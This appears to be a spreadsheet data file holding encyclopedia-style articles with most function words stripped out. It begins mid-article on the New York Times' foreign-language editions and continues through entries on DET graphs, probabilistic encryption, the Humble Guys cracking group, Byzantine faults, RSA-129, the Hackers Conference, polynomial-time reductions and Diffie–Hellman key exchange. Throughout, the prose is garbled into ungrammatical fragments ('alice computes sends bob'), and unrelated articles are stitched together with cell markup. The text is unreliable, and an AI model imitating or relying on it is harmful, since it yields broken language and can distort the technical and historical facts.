develop, briefly adding second site, cn.nytstyle.com, android apps, newsletters, accessible inside prc. china operations also produce print publications chinese. traffic cn.nytimes.com, meanwhile, risen widespread technology growing chinese audience outside mainland china. york times articles also available users china mirror websites, apps, domestic newspapers, social media. chinese platforms represent york times' five digital markets globally. editor-in-chief chinese platforms ching-ching york times español (spanish-language) between february 2016 september 2019, york times launched standalone spanish-language edition, york times español. spanish-language version featured increased coverage news events latin america spain. expansion spanish language news content allowed newspaper expand audience spanish speaking world increase revenue. spanish-language version seen compete established país newspaper spain, bills "global newspaper spanish." spanish version team journalists mexico city well correspondents venezuela, brazil, argentina, miami, madrid, spain. discontinued september 2019, citing lack financial success reason.in march 2013, york times national film board canada announced partnership titled short history highrise, create four short documentaries internet life high rise buildings part nfb's highrise project, utilizing images newspaper's photo archives first three films, user-submitted images final film. third project short history highrise series peabody award 2013. timesmachine timesmachine web-based archive scanned issues york times 1851 2002.unlike york times online archive, timesmachine presents scanned images actual newspaper. non-advertising content displayed per-story basis separate display page saved future reference. archive available york times subscribers, whether home delivery digital access.–––––––––––––––––––– interruptions because holidays, editions printed november 1851; january 1852; july 1852; january 1853; january 1854.because strikes, regular edition york times printed following periods: september 1923, september 1923. unauthorized local union strike prevented publication several york papers, among york times. during period "the combined york morning newspapers," published summaries news. december 19</t>
  </si>
  <si>
    <t>Detection error tradeoff</t>
  </si>
  <si>
    <t>detection error tradeoff (det) graph graphical plot error rates binary classification systems, plotting false rejection rate false acceptance rate. y-axes scaled non-linearly standard normal deviates logarithmic transformation), yielding tradeoff curves linear curves, image area highlight differences importance critical operating region. axis warping normal deviate mapping normal quantile function, inverse normal cumulative distribution) given probit function, horizontal axis probit(pfa) vertical probit(pfr), false-accept false-reject rates. probit mapping maps probabilities unit interval [0,1], extended real line [−∞, +∞]. since makes axes infinitely long, confine plot finite rectangle interest. also constant false alarm rate detection theory false alarm receiver operating characteristic references</t>
  </si>
  <si>
    <t>Probabilistic encryption</t>
  </si>
  <si>
    <t>probabilistic encryption randomness encryption algorithm, encrypting message several times will, general, yield different ciphertexts. term "probabilistic encryption" typically used reference public encryption algorithms; however various symmetric encryption algorithms achieve similar property (e.g., block ciphers used chaining mode cbc), stream ciphers freestyle inherently random. semantically secure, hide even partial information plaintext, encryption algorithm must probabilistic. history first provably-secure probabilistic public-key encryption scheme proposed shafi goldwasser silvio micali, based hardness quadratic residuosity problem message expansion factor equal public size. more efficient probabilistic encryption algorithms include elgamal, paillier, various constructions random oracle model, including oaep. security probabilistic encryption particularly important using public cryptography. suppose adversary observes ciphertext, suspects plaintext either "yes" "no", hunch plaintext might "attack calais". when deterministic encryption algorithm used, adversary simply encrypting guesses recipient's public key, compare result target ciphertext. combat attack, public encryption schemes must incorporate element randomness, ensuring plaintext maps large number possible ciphertexts. intuitive approach converting deterministic encryption scheme probabilistic simply plaintext random string encrypting deterministic algorithm. conversely, decryption involves applying deterministic algorithm ignoring random padding. however, early schemes applied naive approach broken limitations deterministic encryption schemes. techniques optimal asymmetric encryption padding (oaep) integrate random padding manner secure using trapdoor permutation. examples example probabilistic encryption using trapdoor permutation: single plaintext trapdoor permutation (deterministic encryption algorithm) hard core predicate random string {\displaystyle {\rm {enc}}(x)=(f(r),x\oplus b(r))} {\displaystyle {\rm {dec}}(y,z)=b(f^{-1}(y))\oplus this inefficient single encrypted. words, message expansion factor equal public size. example probabilistic encryption random oracle model: plaintext trapdoor permutation (deterministic encryption algorithm) random oracle (typically implemented using publicly specified hash function) random string {\displaystyle {\rm {enc}}(x)=(f(r),x\oplus h(r))} {\displaystyle {\rm {dec}}(y,z)=h(f^{-1}(y))\oplus also deterministic encryption efficient probabilistic public-key encryption scheme strong secrecy references external links shafi goldwasser silvio micali, probabilistic encryption, special issue journal computer systems sciences, vol. pages 270-299, april 1984 freestyle, randomized version chacha resisting offline brute-force dictionary attacks [1].</t>
  </si>
  <si>
    <t>The Humble Guys</t>
  </si>
  <si>
    <t>humble guys (thg) cracking group late 1980s founded friends known pseudonyms candyman fabulous furlough. group also noticed demoscene cracktros. first group make file means documenting releases packaging distribution. first release contain .nfo file nova logic's remake arcade classic bubble bobble 1989. this since spawned entire generation ascii artists devoted solely creating artwork purpose decorating files warez groups. things perspective, entire websites explicitly devoted collection archival files, isonews. software contributions also first groups release "intro tool" demoscene, released coding subsidiary, f/x, called intromaker. intromaker would allow create self-contained executable program played music displayed graphics screen without need knowledge computer programming. much advanced highly sophisticated extension today would farbrausch's .werkkzeug.prior thg's arrival warez scene world anything text based intros usually quoting song lyrics. members brought experience amiga warez scene bringing first animated graphical intros scene. december 1991 "f/x division" humble guys released first copy electronic magazine called "the humble review" featuring game reviews articles. writer weblogger justin hall would first article published humble review; film review akira "fusty". members also custom software, originally "forum hack", called l.s.d. (lush software designs) first introduced june 1990, written slavelord, niteman others. original source code emulex/2, acquired member whose alias tripin face. source code referred 'jani' communities time. news evening october 1992, television aired episode computer hackers dateline titled "are your secrets safe?". this show prominently displayed several warez bbses, including slave operated senior member spokesperson thg. result undesired exposure, slavelord voluntarily retired activities within group.on september 2006, david francis, known username "candyman" died hometown louis missouri, heart failure.on october 2015, pierre barkett, known username "the pieman" died florida heart failure. competition redefined manner warez scene worked entered scene 1989. prior thg, warez releases haphazard, multiple groups releasing title, usually title available retail stores weeks. often games released bbses without cracked. changed releasing titles days software made retail chains babbage's. they establishing relationships major wholesale software distributors, ordering games overnight shipping. cases overnight shipping enough, found people lived near software companies, could company, game released. this beat overnight shipping method days cases. also, advantage possessed warez groups teens, attended school day. professional men, available 10:30" fedex, delivered. groups "wait home" afternoons. decided advantage considering "cracks" done less hour, releases complete shortly thereafter. members worked morning shows. software companies, ever eager free advertising, would send new, cases "about released" software show, simple phone call. they also understood "progression" software. once title completed, box, manual, final version game shipped "duplication house" copy software sale stores. contacts duplication houses, could games weeks would show store. activision's f-14 tomcat title, along titles microprose. height power, game suppliers (country wide), (leeds), france, germany, many parts asia.thg introduced concept couriers effort plaster releases competitors' bbses. couriers often told make sure various groups received latest crack hq's bbses. combination using software wholesalers couriers turned warez scene upside 1990, considered normal practice now. fierce competition within current warez video scenes directly descended thg. result, majority older, well established, warez groups disappeared scene. four five groups around prior thg's arrival december 1989, group remained international network crackers (inc), thg's greatest competitors cracking scene. file header executable cracktro, readthg.exe (displayed above), contains text reads: "cool hand fucks phantom inc" (sic), insulting reference towards vice-president courier coordinator rival organization, inc. after candyman shut (candyland, originally cnet bbs), setup, development, maintenance unique customization continued maker hand one. after candyman left united states, fabulous furlough took reins group. after political infighting among remaining members group problems within organization, several newer members splintered formed group called (united software association) included several noteworthy members niteman, genesis humble babe (who changed name humble babe upon departure thg). released games, coming thg's suppliers illinois, managed "turn". after bust humble babe credit card fraud charges michigan, teamed european warez division fairlight cooperatively known "usa/flt". this inevitably lead groups warring othera year usa/flt fiasco, several original members humble guys left group effort capture lightning bottle. however, fall 1992 several groups, razor 1911, joined scene group, brief success, never successful thg. group fell apart shortly slavelord shut dateline story. during 1992 though early 1994, many releases cracked branch consisted moonweed, bryn rogers hydro, struggled keep group together burnout. bbses, flying teapot (known active 1991-1992) demons forge (ran hi.t bryn respectively) became uk's major landmarks. 1994, founding members humble guys longer involved warez scene. after pits york shut novell 1995, group moved presence many different servers name #thg. they focused distribution rather cracking. humble guys disbanded early 2000s last founding member left. references</t>
  </si>
  <si>
    <t>Byzantine fault</t>
  </si>
  <si>
    <t>byzantine fault (also byzantine generals problem, interactive consistency, source congruency, error avalanche, byzantine agreement problem, byzantine failure) condition computer system, particularly distributed computing systems, components fail imperfect information whether component failed. term takes name allegory, "byzantine generals problem", developed describe situation which, order avoid catastrophic failure system, system's actors must agree concerted strategy, actors unreliable. byzantine fault, component server inconsistently appear failed functioning failure-detection systems, presenting different symptoms different observers. difficult components declare failed shut network, need first reach consensus regarding component failed first place. byzantine fault tolerance (bft) resiliency fault-tolerant computer system conditions. analogy simplest form, number generals attacking fortress must decide group whether attack retreat. some generals prefer attack, others prefer retreat. important thing generals agree common decision, halfhearted attack generals would become rout, would worse either coordinated attack coordinated retreat. problem complicated presence treacherous generals cast vote suboptimal strategy, selectively. instance, nine generals voting, four support attacking four others favor retreat, ninth general send vote retreat generals favor retreat, vote attack rest. those received retreat vote ninth general retreat, rest attack (which well attackers). problem complicated generals physically separated send votes messengers fail deliver votes forge false votes. resolution byzantine fault tolerance achieved loyal (non-faulty) generals majority agreement strategy. there default vote value given missing messages. example, missing messages given "null" value. further, agreement null votes majority, pre-assigned default strategy used (e.g. retreat).the typical mapping story onto computer systems computers generals digital communication system links messengers. although problem formulated analogy decision-making security problem, electronics, cannot solved cryptographic digital signatures alone, failures incorrect voltages propagate encryption process. thus, component appear functioning component faulty another, prevents forming consensus whether component faulty not. characteristics byzantine fault fault presenting different symptoms different observers. byzantine failure loss system service byzantine fault systems require consensus.the objective byzantine fault tolerance able defend failures system components without symptoms prevent components system reaching agreement among themselves, agreement needed correct operation system. remaining operationally correct components byzantine fault tolerant system able continue providing system's service originally intended, assuming sufficient number accurately-operating components maintain service. byzantine failures considered general difficult class failures among failure modes. so-called fail-stop failure mode occupies simplest spectrum. whereas fail-stop failure mode simply means fail node crash, detected nodes, byzantine failures imply restrictions, means failed node generate arbitrary data, including data makes appear like functioning node. thus, byzantine failures confuse failure detection systems, makes fault tolerance difficult. despite analogy, byzantine failure necessarily security problem involving hostile human interference: arise purely electrical software faults. terms fault failure used according standard definitions originally created joint committee "fundamental concepts terminology" formed ieee computer society's technical committee dependable computing fault-tolerance ifip working group 10.4 dependable computing fault tolerance. also dependability. caveat byzantine fault tolerance concerned broadcast consistency, property component broadcasts single consistent value components (i.e., sends value components), receive exactly value, case broadcaster consistent, components agree common value. this kind fault tolerance encompass correctness value itself; example, adversarial component deliberately sends incorrect value, sends value consistently components, caught byzantine fault tolerance scheme. formal definition setting: given system components, dishonest, assuming point-to-point channel components. whenever component tries broadcast value components allowed discuss verify consistency broadcast, eventually settle common value property: system said resist byzantine faults component broadcast value then: honest, honest components agree value case, honest components agree value y.variants: problem studied case synchronous asynchronous communications. communication graph assumed complete graph (i.e. component discuss every other), communication graph restricted. also relaxed "realistic" problem faulty components collude together attempt lure others error. setting practical algorithms devised. history problem obtaining byzantine consensus conceived formalized robert shostak, dubbed interactive consistency problem. this work done 1978 context nasa-sponsored sift project computer science international. sift (for software implemented fault tolerance) brain child john wensley, based idea using multiple general-purpose computers would communicate pairwise messaging order reach consensus, even computers faulty. beginning project, clear many computers total needed guarantee conspiracy faulty computers could "thwart" efforts correctly-operating ones reach consensus. shostak showed minimum 3n+1 needed, devised two-round 3n+1 messaging protocol would work n=1. colleague marshall pease generalized algorithm proving 3n+1 necessary sufficient. these results, together later proof leslie lamport sufficiency using digital signatures, published seminal paper, reaching agreement presence faults. authors awarded 2005 edsger dijkstra prize paper. make interactive consistency problem easier understand, lamport devised colorful allegory group army generals formulate plan attacking city. original version, story cast generals commanders albanian army. name changed, eventually settling "byzantine", suggestion jack goldberg future-proof potential offense giving. this formulation problem, together additional results, presented authors 1982 paper, "the byzantine generals problem". examples several examples byzantine failures occurred given equivalent journal papers. these examples described nasa dashlink pages.byzantine errors observed infrequently irregular points endurance testing newly constructed virginia class submarines, least 2005 (when issues publicly reported). implementations example bitcoin, peer-to-peer digital cash system. bitcoin network works parallel generate blockchain proof-of-work allowing system overcome byzantine failures reach coherent global view system's state. some aircraft systems, boeing aircraft information management system (via arinc safebus network), boeing flight control system, boeing flight control systems byzantine fault tolerance; real-time systems, byzantine fault tolerance solutions must latency. example, safebus achieve byzantine fault tolerance within order microsecond added latency. spacex dragon considers byzantine fault tolerance design.byzantine fault tolerance mechanisms components repeat incoming message signature) recipients incoming message. mechanisms make assumption repeating message blocks propagation byzantine symptoms. systems high degree safety security criticality, assumptions must proven true acceptable level fault coverage. when providing proof testing, difficulty creating sufficiently wide range signals byzantine symptoms. such testing likely require specialized fault injectors. solutions several early solutions described lamport, shostak, pease 1982. they began noting generals' problem reduced solving "commander lieutenants" problem loyal lieutenants must unison action must correspond commander ordered case commander loyal: solution considers scenarios messages forged, byzantine-fault-tolerant long number disloyal generals less third generals. impossibility dealing one-third traitors ultimately reduces proving commander lieutenants problem cannot solved, commander traitorous. this, suppose traitorous commander lieutenants, tells attack retreat, send messages other, forwarding message, neither figure traitor, since necessarily a—the lieutenant could forged message purportedly shown number generals total, number traitors solutions problem communication synchronous (bounded delay). second solution requires unforgeable message signatures. security-critical systems, digital signatures modern computer systems, achieved practice using public-key cryptography) provide byzantine fault tolerance presence arbitrary number traitorous generals. however, safety-critical systems (where "security" addresses intelligent threats "safety" addresses inherent dangers activity mission), simple error detecting codes, crcs, provide weaker often sufficient coverage much lower cost. this true byzantine non-byzantine faults. furthermore, sometimes security measures weaken safety vice versa. thus, cryptographic digital signature methods good choice safety-critical systems, unless also specific security threat well. while error detecting codes, crcs, better cryptographic techniques, neither provide adequate coverage active electronics safety-critical systems. this illustrated schrödinger scenario crc-protected message single byzantine faulty presents different data different observers observer sees valid crc. also presented variation first solutions allowing byzantine-fault-tolerant behavior situations generals communicate directly other.several system architectures designed 1980 implemented byzantine fault tolerance. these include: draper's ftmp, honeywell's mmfcs, sri's sift. advanced solutions 1999, miguel castro barbara liskov introduced "practical byzantine fault tolerance" (pbft) algorithm, provides high-performance byzantine state machine replication, processing thousands requests second sub-millisecond increases latency. after pbft, several protocols introduced improve robustness performance. instance, q/u, zyzzyva, abstracts, addressed performance cost issues; whereas protocols, like aardvark rbft, addressed robustness issues. furthermore, adapt tried make existing protocols, switching adaptive way, improve system robustness performance underlying conditions change. furthermore, protocols introduced leverage trusted components reduce number replicas, e.g., a2m-pbft-ea minbft.motivated pbft, tendermint introduced partial asynchronous networks mainly used proof stake blockchains. while tolerating byzantine faults ideal property, requires least four independent administrative domains. mitigate limitation, scalar introduced realize "practical byzantine fault detection" algorithm, detects byzantine faults administrative domains transactional database system. also references external links byzantine fault tolerance rkbexplorer</t>
  </si>
  <si>
    <t>The Magic Words are Squeamish Ossifrage</t>
  </si>
  <si>
    <t>"the magic words squeamish ossifrage" solution challenge ciphertext posed inventors cipher 1977. problem appeared martin gardner's mathematical games column august 1977 issue scientific american. solved 1993–94 large, joint computer project co-ordinated derek atkins, michael graff, arjen lenstra paul leyland. more volunteers contributed time 1,600 machines (two machines) months. coordination done internet first projects. ossifrage ('bone-breaker', latin) older name bearded vulture, scavenger famous dropping animal bones live tortoises rocks crack open. 1993–94 effort began tradition using words "squeamish ossifrage" cryptanalytic challenges. difficulty breaking cipher recovering plaintext message given ciphertext public connected difficulty factoring large numbers. while known whether problems mathematically equivalent, factoring currently publicly known method directly breaking rsa. decryption 1977 ciphertext involved factoring 129-digit (426 bit) number, rsa-129, order recover plaintext. rivest estimated 1977 factoring 125-digit semiprime would require quadrillion years, using best algorithm known fastest computers day. original paper recommended using 200-digit (663 bit) primes provide margin safety future developments, though delayed solution 200-digit semiprime factored 2005. efficient factoring algorithms studied much time, progress made following decades. atkins used quadratic sieve algorithm invented carl pomerance 1981. while asymptotically faster number field sieve invented, clear time would better quadratic sieve 129-digit numbers. memory requirements newer algorithm also concern.there us$100 prize associated challenge, winners donated free software foundation. 2015, rsa-129 number factored day, cado-nfs open source implementation number field sieve, using commercial cloud computing service $30. also brute force attack distributed.net numbers references external links technical paper derek atkins' site (postscript file)</t>
  </si>
  <si>
    <t>The Hackers Conference</t>
  </si>
  <si>
    <t>hackers conference annual invitation-only gathering designers, engineers programmers discuss latest developments innovations computer industry. daily basis, many hackers interact virtually, therefore rarely face-to-face contact. conference time hackers come together share ideas. history first hackers conference organized 1984 marin county, california, stewart brand associates whole earth point foundation. conceived response steven levy's book, hackers: heroes computer revolution, inspired brand arrange meeting individuals, "hackers", book named. first conference's roughly attendees included steve wozniak, nelson, richard stallman, john draper, richard greenblatt, robert woodhead, wallace. gathering identified instrumental establishing libertarian ethos attributed cyberculture, subject documentary, produced kqed: hackers wizards electronic age. participants original 1984 hackers conference here list participants original 1984 hackers conference, given contact list distributed participants titled "list participants hackers' conference november 9–11, 1984" arthur abraham, adams, phil agre, dick ainsworth, albrecht, bill atkinson, bill bates, allen baum, bruce baumgart, mike beeler, ward bell, gerry berkowitz, nancy blachman, steve bobker, stewart bonn, russell brand, stewart brand, john brockman, dennis brothers, bill budge, john bumgarner, bill burns, canfil, steve capps, doug carlston, simon cassidy, dave caulkins, richard cheshire, fred cisin, mike coffey, margot comstock, rich davis, steven dompier, dorman, john draper, mark duchaineau, earnest, philip elmer-dewitt, erik fair, richard fateman, felsenstein, fenlason, fabrice florin, andrew fluegelman, robert frankston, paul freiberger, fulop, robert gaskins, nasir gebelli, steve gibson, geoff goodfellow, richard greenblatt, roger gregory, leslie grimm, robert hardy, brian harvey, dick heiser, matt herron, andy hertzfeld, bruce horn, david hughes, john james, jennings, jerry jewell, chris jochumson, kaehler, tara khalsa, scott kim, peter ladeau, fred lakin, marc brun, leeke, david levitt, steven levy, henry lieberman, efrem lipkin, william low, david lubar, scott mace, john markoff, david maynard, mcconaghy, roger melen, diana merry, mark miller, charles moore, michael naimark, nelson, terry niksch, nouri, david oster, ozzie, donn parker, howard pearlmutter, mark pelczarski, michael perry, patricia phelan, pittman, eric podietz, kevin poulsen, jerry pournelle, larry press, steve purcell, christopher reed, david reed, barbara robertson, michael rogers, pete rowe, peter samson, steve saunders, laura scholl, rich schroeppel, scoville, rony sebok, rhod sharp, shur, burrell smith, david snider, spence, spurgeon, richard stallman, michael swaine, david taylor, jack trainor, tribble, bruce natta, wallace, walter (gene) wallis, bruce webster, williams, deborah wise, steve witham, robert woodhead, woods, steve wozniak, fred wright logo scott designed iconic hackers conference logo. references external links official site hackers wizards electronic (video)</t>
  </si>
  <si>
    <t>Polynomial-time reduction</t>
  </si>
  <si>
    <t>computational complexity theory, polynomial-time reduction method solving problem using another. shows hypothetical subroutine solving second problem exists, first problem solved transforming reducing inputs second problem calling subroutine times. time required transform first problem second, number times subroutine called polynomial, first problem polynomial-time reducible second.a polynomial-time reduction proves first problem difficult second one, whenever efficient algorithm exists second problem, exists first problem well. contraposition, efficient algorithm exists first problem, none exists second either. polynomial-time reductions frequently used complexity theory defining complexity classes complete problems classes. types reductions three common types polynomial-time reduction, least restrictive, polynomial-time many-one reductions, truth-table reductions, turing reductions. frequently used many-one reductions, cases phrase "polynomial-time reduction" used mean polynomial-time many-one reduction. general reductions turing reductions restrictive many-one reductions truth-table reductions occupying space between. many-one reductions polynomial-time many-one reduction problem problem (both usually required decision problems) polynomial-time algorithm transforming inputs problem inputs problem transformed problem output original problem. instance problem solved applying transformation produce instance problem giving input algorithm problem returning output. polynomial-time many-one reductions also known polynomial transformations karp reductions, named richard karp. reduction type denoted {\displaystyle a\leq _{m}^{p}b} {\displaystyle a\leq _{p}b} truth-table reductions polynomial-time truth-table reduction problem problem (both decision problems) polynomial time algorithm transforming inputs problem fixed number inputs problem output original problem expressed function outputs function maps outputs output must inputs, expressed truth table. reduction type denoted expression {\displaystyle a\leq _{tt}^{p}b} turing reductions polynomial-time turing reduction problem problem algorithm solves problem using polynomial number calls subroutine problem polynomial time outside subroutine calls. polynomial-time turing reductions also known cook reductions, named stephen cook. reduction type denoted expression {\displaystyle a\leq _{t}^{p}b} many-one reductions regarded restricted variants turing reductions number calls made subroutine problem exactly value returned reduction value returned subroutine. completeness complete problem given complexity class reduction problem belongs every problem reduction instance, problem np-complete belongs problems polynomial-time many-one reductions problem belongs proven np-complete finding single polynomial-time many-one reduction known np-complete problem. polynomial-time many-one reductions used define complete problems complexity classes, including pspace-complete languages exptime-complete languages.every decision problem (the class polynomial-time decision problems) reduced every nontrivial decision problem (where nontrivial means every input output), polynomial-time many-one reduction. transform instance problem solve polynomial time, solution choose instances problem different answers. therefore, complexity classes within itself, polynomial-time reductions cannot used define complete languages: used way, every nontrivial problem would complete. instead, weaker reductions log-space reductions reductions used defining classes complete problems classes, p-complete problems. defining complexity classes definitions complexity classes pspace, exptime involve reductions: reductions come study definition complete languages classes. however, cases complexity class defined reductions. decision problem, define complexity class consisting languages {\displaystyle a\leq _{m}^{p}c} case, automatically complete complete problems well. example complexity class {\displaystyle \exists \mathbb defined existential theory reals, computational problem known np-hard pspace, known complete pspace, language polynomial hierarchy. {\displaystyle \exists \mathbb problems polynomial-time many-one reduction existential theory reals; several complete problems determining rectilinear crossing number undirected graph. each problem {\displaystyle \exists \mathbb inherits property belonging pspace, {\displaystyle \exists \mathbb -complete problem np-hard.similarly, complexity class consists problems reduced graph isomorphism problem. since graph isomorphism known belong co-am, true every problem class. problem gi-complete complete class; graph isomorphism problem gi-complete, several related problems. also karp's np-complete problems external links opencourseware: complexity: np-completeness, reductions references</t>
  </si>
  <si>
    <t>Diffie–Hellman key exchange</t>
  </si>
  <si>
    <t>diffie–hellman exchange method securely exchanging cryptographic keys public channel first public-key protocols conceived ralph merkle named whitfield diffie martin hellman. earliest practical examples public exchange implemented within field cryptography. published 1976 diffie hellman, earliest publicly known work proposed idea private corresponding public key. traditionally, secure encrypted communication parties required first exchange keys secure physical means, paper lists transported trusted courier. diffie–hellman exchange method allows parties prior knowledge jointly establish shared secret insecure channel. this used encrypt subsequent communications using symmetric-key cipher. diffie–hellman used secure variety internet services. however, research published october 2015 suggests parameters many internet applications time strong enough prevent compromise well-funded attackers, security services countries.the scheme published whitfield diffie martin hellman 1976, 1997 revealed james ellis, clifford cocks, malcolm williamson gchq, british signals intelligence agency, previously shown 1969 public-key cryptography could achieved.although diffie–hellman agreement non-authenticated key-agreement protocol, provides basis variety authenticated protocols, used provide forward secrecy transport layer security's ephemeral modes (referred depending cipher suite). method followed shortly afterwards rsa, implementation public-key cryptography using asymmetric algorithms. expired u.s. patent 4,200,770 1977 describes public-domain algorithm. credits hellman, diffie, merkle inventors. name 2002, hellman suggested algorithm called diffie–hellman–merkle exchange recognition ralph merkle's contribution invention public-key cryptography (hellman, 2002), writing: system...has since become known diffie–hellman exchange. while system first described paper diffie public distribution system, concept developed merkle, hence called 'diffie–hellman–merkle exchange' names associated hope small pulpit might help endeavor recognize merkle's equal contribution invention public cryptography. description general overview diffie–hellman exchange establishes shared secret parties used secret communication exchanging data public network. analogy illustrates concept public exchange using colors instead large numbers: process begins parties, alice bob, publicly agree arbitrary starting color need kept secret. example, color yellow. each person also selects secret color keep case, cyan. crucial part process alice secret color together mutually shared color, resulting orange-tan light-blue mixtures respectively, publicly exchange mixed colors. finally, mixes color received partner private color. result final color mixture (yellow-brown case) identical partner's final color mixture. third party listened exchange, would know common color (yellow) first mixed colors (orange-tan light-blue), would hard find final secret color (yellow-brown). bringing analogy back real-life exchange using large numbers rather colors, determination computationally expensive. impossible compute practical amount time even modern supercomputers. cryptographic explanation simplest original implementation protocol uses multiplicative group integers modulo prime, primitive root modulo these values chosen ensure resulting shared secret take value p–1. here example protocol, non-secret values blue, secret values red. alice publicly agree modulus base (which primitive root modulo 23). alice chooses secret integer sends example value usually case) chooses secret integer sends alice alice computes computes alice share secret (the number 18).both alice arrived values {\displaystyle {\color {blue}a}^{\color {red}b}{\bmod {\color {blue}p}}={\color {blue}g}^{\color {red}ab}{\bmod {\color {blue}p}}={\color {blue}g}^{\color {red}ba}{\bmod {\color {blue}p}}={\color {blue}b}^{\color {red}a}{\bmod {\color {blue}p}}} more specifically, {\displaystyle ({\color {blue}g}^{\color {red}a}{\bmod {\color {blue}p}})^{\color {red}b}{\bmod {\color {blue}p}}=({\color {blue}g}^{\color {red}b}{\bmod {\color {blue}p}})^{\color {red}a}{\bmod {\color {blue}p}}} only kept secret. values sent clear. strength scheme comes fact take extremely long times compute known algorithm knowledge once alice compute shared secret encryption key, known them, sending messages across open communications channel. course, much larger values would needed make example secure, since possible results however, prime least digits, even fastest modern computers using fastest known algorithm cannot find given such problem called discrete logarithm problem. computation known modular exponentiation done efficiently even large numbers. note need large all, practice usually small integer (like ...). secrecy chart chart depicts knows what, non-secret values blue, secret values red. here eavesdropper watches sent alice bob, alter contents communications. public (prime) base, known alice, bob, eve. public (prime) modulus, known alice, bob, eve. alice's private key, known alice. bob's private known bob. alice's public key, known alice, bob, eve. bob's public key, known alice, bob, eve. 19now shared secret known alice bob, eve. note helpful compute equals note: difficult alice solve bob's private solve alice's private key. difficult alice solve bob's private vice versa), simply substitute private public pair, plug bob's public private key, produce fake shared secret key, solve bob's private (and solve shared secret key. attempt choose public private pair make easy solve bob's private key). generalization finite cyclic groups here general description protocol: alice agree finite cyclic group order generating element (this usually done long rest protocol; assumed known attackers.) group written multiplicatively. alice picks random natural number sends element bob. picks random natural number sends element alice. alice computes element (gb)a computes element (ga)b g.both alice possession group element gba, serve shared secret key. group satisfies requisite condition secure communication long efficient algorithm determining given example, elliptic curve diffie–hellman protocol variant represents element point elliptic curve instead integer modulo variants using hyperelliptic curves also proposed. supersingular isogeny exchange diffie–hellman variant designed secure quantum computers. ephemeral and/or static keys used keys either ephemeral static (long term) key, could even mixed, called semi-static these variants different properties hence different cases. overview many variants also discussions example found nist 800-56a. here basic list: ephemeral, ephemeral: usually used agreement. provides forward secrecy, authenticity. static, static: would generate long term shared secret. does provide forward secrecy, implicit authenticity. since keys static would example protect replay-attacks. ephemeral, static: example used elgamal encryption integrated encryption scheme (ies). used agreement could provide implicit one-sided authenticity (the ephemeral side could verify authenticity static side). forward secrecy provided.it possible ephemeral static keys agreement provide security example shown nist 800-56a, also possible combine single exchange, called triple (3-dh). triple diffie-hellman (3-dh) 1997 kind double proposed simon blake-wilson, johnson, alfred menezes "key agreement protocols security analysis (1997)", improved kudla paterson “modular security proofs agreement protocols (2005)” shown secure. it's also used mentioned variants. example: extended triple diffie-hellman sci.crypt news group (from 18.08.2002) double ratchet algorithm signal protocolthe long term secret keys alice denoted respectively, public keys well ephemeral pairs then protocol long term public keys need transferred somehow. that done beforehand separate, trusted channel, public keys encrypted using partial agreement preserve anonymity. details well improvements like side channel protection explicit confirmation, well early messages additional password authentication, could e.g. look "advanced modular handshake agreement optional authentication" operation parties diffie–hellman agreement limited negotiating shared participants. number users take part agreement performing iterations agreement protocol exchanging intermediate data (which need kept secret). example, alice, bob, carol could participate diffie–hellman agreement follows, operations taken modulo parties agree algorithm parameters parties generate private keys, named alice computes sends bob. computes (ga)b sends carol. carol computes (gab)c gabc uses secret. computes sends carol. carol computes (gb)c sends alice. alice computes (gbc)a gbca gabc uses secret. carol computes sends alice. alice computes (gc)a sends bob. computes (gca)b gcab gabc uses secret.an eavesdropper able gab, gac, gbc, cannot combination efficiently reproduce gabc. extend mechanism larger groups, basic principles must followed: starting "empty" consisting secret made raising current value every participant's private exponent once, order (the first exponentiation yields participant's public key). intermediate value (having exponents applied, number participants group) revealed publicly, final value (having exponents applied) constitutes shared secret hence must never revealed publicly. thus, user must obtain copy secret applying private last (otherwise would last contributor communicate final recipient, last contributor would turned secret group wished protect).these principles leave open various options choosing order participants contribute keys. simplest obvious solution arrange participants circle keys rotate around circle, eventually every contributed participants (ending owner) participant contributed keys (ending own). however, requires every participant perform modular exponentiations. choosing optimal order, relying fact keys duplicated, possible reduce number modular exponentiations performed participant log2(n) using divide-and-conquer-style approach, given eight participants: participants perform exponentiation, yielding gabcd; value sent return, participants receive gefgh. participants perform exponentiation, yielding gefghab, send same, yielding gefghcd, send participant performs exponentiation, yielding gefghcda, sends similarly, sends gefghcdb similarly. participant performs final exponentiation, yielding secret gefghcdba gabcdefgh, gefghcdab gabcdefgh; again, similarly. participants simultaneously perform operations using gabcd starting point.once operation completed participants possess secret gabcdefgh, participant performed four modular exponentiations, rather eight implied simple circular arrangement. security protocol considered secure eavesdroppers chosen properly. particular, order group must large, particularly group used large amounts traffic. eavesdropper solve diffie–hellman problem obtain gab. this currently considered difficult groups whose order large enough. efficient algorithm solve discrete logarithm problem would make easy compute solve diffie–hellman problem, making many public cryptosystems insecure. fields small characteristic less secure.the order large prime factor prevent pohlig–hellman algorithm obtain reason, sophie germain prime sometimes used calculate called safe prime, since order divisible sometimes chosen generate order subgroup rather legendre symbol never reveals order protocol using choice example ikev2.g often small integer because random self-reducibility discrete logarithm problem small equally secure generator group. alice random number generators whose outputs completely random predicted extent, much easier eavesdrop. original description, diffie–hellman exchange provide authentication communicating parties thus vulnerable man-in-the-middle attack. mallory active attacker executing man-in-the-middle attack) establish distinct exchanges, alice bob, effectively masquerading alice bob, vice versa, allowing decrypt, re-encrypt, messages passed them. note mallory must continue middle, actively decrypting re-encrypting messages every time alice communicate. ever absent, previous presence revealed alice bob. they know private conversations intercepted decoded someone channel. cases help mallory's private key, even used exchanges. method authenticate communicating parties generally needed prevent type attack. variants diffie–hellman, protocol, used instead avoid types attacks. practical attacks internet traffic number field sieve algorithm, generally effective solving discrete logarithm problem, consists four computational steps. first three steps depend order group specific number whose finite desired. turns much internet traffic uses handful groups order 1024 bits less. precomputing first three steps number field sieve common groups, attacker need carry last step, much less computationally expensive first three steps, obtain specific logarithm. logjam attack used vulnerability compromise variety internet services allowed groups whose order 512-bit prime number, called export grade. authors needed several thousand cores week precompute data single 512-bit prime. once done, individual logarithms could solved minute using 18-core intel xeon cpus.as estimated authors behind logjam attack, much difficult precomputation needed solve discrete problem 1024-bit prime would cost order $100 million, well within budget large national intelligence agency u.s. national security agency (nsa). logjam authors speculate precomputation widely reused 1024-bit primes behind claims leaked documents able break much current cryptography.to avoid vulnerabilities, logjam authors recommend elliptic curve cryptography, similar attack known. failing that, recommend order, diffie–hellman group least 2048 bits. they estimate pre-computation required 2048-bit prime times difficult 1024-bit primes. other uses encryption public encryption schemes based diffie–hellman exchange proposed. first scheme elgamal encryption. modern variant integrated encryption scheme. forward secrecy protocols achieve forward secrecy generate pairs session discard session. diffie–hellman exchange frequent choice protocols, fast generation. password-authenticated agreement 